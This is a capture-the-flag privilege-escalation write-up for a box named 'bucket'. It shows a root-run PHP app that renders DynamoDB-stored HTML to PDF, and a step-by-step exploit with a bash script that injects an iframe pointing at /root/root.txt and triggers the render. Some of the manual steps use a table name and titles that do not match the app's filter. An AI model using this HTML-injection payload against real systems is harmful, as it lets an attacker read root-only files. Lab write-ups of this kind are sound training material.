6 privesc

The service running on port 8000 is assigned the user root:
<VirtualHost 127.0.0.1:8000>
        # mpm_itk switches the worker handling this vhost's requests to the given
        # user/group, so the PHP app under DocumentRoot -- and any process it
        # spawns (see the passthru() call in index.php) -- executes as root.
        <IfModule mpm_itk_module>
                AssignUserId root root
        </IfModule>
        DocumentRoot /var/www/bucket-app
</VirtualHost>

http://localhost:8000/
Site under construction or maintenance

roy@bucket:~$ ls -la /var/www/bucket-app/
total 856
drwxr-x---+  4 root root   4096 Feb 10  2021 .
drwxr-xr-x   4 root root   4096 Feb 10  2021 ..
-rw-r-x---+  1 root root     63 Sep 23  2020 composer.json
-rw-r-x---+  1 root root  20533 Sep 23  2020 composer.lock
drwxr-x---+  2 root root   4096 Feb 10  2021 files
-rwxr-x---+  1 root root  17222 Sep 23  2020 index.php
-rwxr-x---+  1 root root 808729 Jun 10  2020 pd4ml_demo.jar
drwxr-x---+ 10 root root   4096 Feb 10  2021 vendor

roy@bucket:/var/www/bucket-app$ cat index.php
<?php
// Front controller of the app bound to 127.0.0.1:8000. The listing is truncated
// after the opening of the else branch (its inline HTML is not shown here).
require 'vendor/autoload.php';
use Aws\DynamoDb\DynamoDbClient;
// Work only happens for POST requests carrying action=get_alerts; every other
// request falls through to the else branch below.
if($_SERVER["REQUEST_METHOD"]==="POST") {
        if($_POST["action"]==="get_alerts") {
                date_default_timezone_set('America/New_York');
                // Talks to the local DynamoDB-compatible endpoint (localhost:4566), not AWS itself.
                $client = new DynamoDbClient([
                        'profile' => 'default',
                        'region'  => 'us-east-1',
                        'version' => 'latest',
                        'endpoint' => 'http://localhost:4566'
                ]);

                // Full scan of the 'alerts' table, filtered to items whose title is exactly "Ransomware".
                $iterator = $client->getIterator('Scan', array(
                        'TableName' => 'alerts',
                        'FilterExpression' => "title = :title",
                        'ExpressionAttributeValues' => array(":title"=>array("S"=>"Ransomware")),
                ));

                // Each matching item's "data" attribute is written verbatim into files/<random>.html.
                // rand() is not a CSPRNG and the name is never checked for collisions; because
                // $name is overwritten on every iteration, only the last item's file is converted below.
                // NOTE(review): with the raw Scan iterator, $item["data"] is presumably the
                // attribute-value map (['S' => ...]); file_put_contents() accepts an array and
                // writes its elements, which would be why this works -- verify against the SDK.
                foreach ($iterator as $item) {
                        $name=rand(1,10000).'.html';
                        file_put_contents('files/'.$name,$item["data"]);
                }
                // Renders the last written HTML file to files/result.pdf. The converter runs as
                // the web server user (root on this host, per the vhost's AssignUserId), and the
                // HTML it renders is whatever was stored in the table, so anyone who can write to
                // 'alerts' controls the rendered document. If the scan matched nothing, $name is
                // undefined here. Mitigation: run the converter as an unprivileged user, do not
                // render untrusted HTML, and restrict the renderer from loading local resources.
                passthru("java -Xmx512m -Djava.awt.headless=true -cp pd4ml_demo.jar Pd4Cmd file:///var/www/bucket-app/files/$name 800 A4 -out files/result.pdf");
        }
}
else
{
// Non-POST requests continue as inline HTML (not included in this listing).
?>

# if the request is a POST with action=get_alerts,
# it connects to DynamoDB, scans the table 'alerts' and filters by title 'Ransomware';
# for each entry it creates a randomly named .html file and writes the entry's data into it,
# then runs pd4ml on the last such file to produce files/result.pdf

Exploit Process:

  1. Create table alerts

  2. Add an entry to the table with an iframe that reads /root/root.txt

  3. POST request to :8000 with action=get_alerts

  4. Check for result.pdf in /var/www/bucket-app/files/

# creating the table in DynamoDB
// Table definition: composite primary key of title (partition) and data (sort), both strings.
var params = {
    TableName: 'kashz',
    KeySchema: [
        { AttributeName: 'title', KeyType: 'HASH' },
        { AttributeName: 'data', KeyType: 'RANGE' }
    ],
    AttributeDefinitions: [
        { AttributeName: 'title', AttributeType: 'S' },
        { AttributeName: 'data', AttributeType: 'S' }
    ],
    ProvisionedThroughput: { ReadCapacityUnits: 10, WriteCapacityUnits: 5 }
};
dynamodb.createTable(params, function (err, data) {
    // Pretty-print whichever the callback delivered; an error takes precedence.
    if (err) {
        ppJson(err);
        return;
    }
    ppJson(data);
});

# using the cli
$ cat create-table.json
{
    "TableName": "kashz",
    "KeySchema": [
      { "AttributeName": "title", "KeyType": "HASH" },
      { "AttributeName": "data", "KeyType": "RANGE" }
    ],
    "AttributeDefinitions": [
      { "AttributeName": "title", "AttributeType": "S" },
      { "AttributeName": "data", "AttributeType": "S" }
    ],
    "ProvisionedThroughput": {
      "ReadCapacityUnits": 10,
      "WriteCapacityUnits": 5
    }
}
$ aws dynamodb --endpoint-url http://s3.bucket.htb create-table --cli-input-json file://create-table.json

# adding an item using put-item
// Document-client put: attribute types are inferred from the JS values, so no {"S": ...} wrapping.
var params = {
    TableName: 'kashz',
    Item: { title: 'ransomware', data: '/root/root.txt' }
};
docClient.put(params, function (err, data) {
    // Pretty-print whichever the callback delivered; an error takes precedence.
    if (err) {
        ppJson(err);
        return;
    }
    ppJson(data);
});
# using the cli
$ aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name kashz --item '{"title":{"S":"item3"},"data":{"S":"/root/root.txt"}}'

# now send the request to :8000 with action=get_alerts
curl -X POST http://127.0.0.1:8000 --data "action=get_alerts"

Automated Exploit File

# using a script
#!/bin/bash
# Creates the 'alerts' table the app scans, inserts the record it filters for,
# lists the table, then triggers the conversion on :8000.

endpoint="http://s3.bucket.htb"
table="alerts"

echo "Creating 'alerts' table:"
cat > create-table.json << EOF
{
    "TableName": "${table}",
    "KeySchema": [
      { "AttributeName": "title", "KeyType": "HASH" },
      { "AttributeName": "data", "KeyType": "RANGE" }
    ],
    "AttributeDefinitions": [
      { "AttributeName": "title", "AttributeType": "S" },
      { "AttributeName": "data", "AttributeType": "S" }
    ],
    "ProvisionedThroughput": {
      "ReadCapacityUnits": 15,
      "WriteCapacityUnits": 10
    }
}
EOF
aws --endpoint-url "${endpoint}" dynamodb create-table --cli-input-json file://create-table.json

# Short pauses give the endpoint time to settle between calls.
sleep 2
echo "Adding record:"
aws --endpoint-url "${endpoint}" dynamodb put-item --table-name "${table}" --item '{"title":{"S":"Ransomware"},"data":{"S":"<html><iframe src=\"/root/root.txt\"></iframe><html>"}}'

sleep 2
echo "Listing records:"
aws --endpoint-url "${endpoint}" dynamodb scan --table-name "${table}"

echo "Sending POST request:"
curl -X POST http://127.0.0.1:8000 --data "action=get_alerts"

echo "Done!"

Now we can read the .pdf file, which contains the flag.
